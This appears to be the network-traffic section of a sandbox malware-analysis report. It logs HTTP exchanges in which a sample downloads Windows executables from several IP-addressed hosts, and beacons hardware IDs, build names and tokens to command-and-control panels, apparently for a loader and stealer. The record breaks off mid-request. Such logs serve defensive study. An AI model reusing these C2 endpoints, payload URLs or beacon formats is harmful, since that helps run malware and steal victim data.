Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:55:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:55:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:55:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:55:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:55:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=0f16be3cd5b64bfc24_1392832568208400914
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET /files/BlueMail.exe HTTP/1.1Host: 45.11.183.55
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014844001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014878001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014879001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014880001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014881001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014882001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 38 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014883001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sanboxland.proContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sanboxland.proContent-Length: 162Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 45 36 31 31 36 44 30 38 39 33 37 30 39 35 36 46 31 45 44 46 46 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 31 45 41 42 42 46 45 39 41 32 45 45 45 45 41 34 44 34 39 46 31 33 44 35 34 38 30 33 42 42 42 37 36 45 37 31 39 39 30 30 32 44 42 43 43 30 43 42 39 35 33 31 30 34 45 42 36 46 44 42 30 33 32 30 43 43 35 46 33 38 42 43 46 44 45 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FE6116D089370956F1EDFF6102794AFA17E4CADC3DDBE1EABBFE9A2EEEEA4D49F13D54803BBB76E7199002DBCC0CB953104EB6FDB0320CC5F38BCFDE
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 37 30 30 39 37 31 45 35 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="hwid"83700971E58A3788952882------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build"stok------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 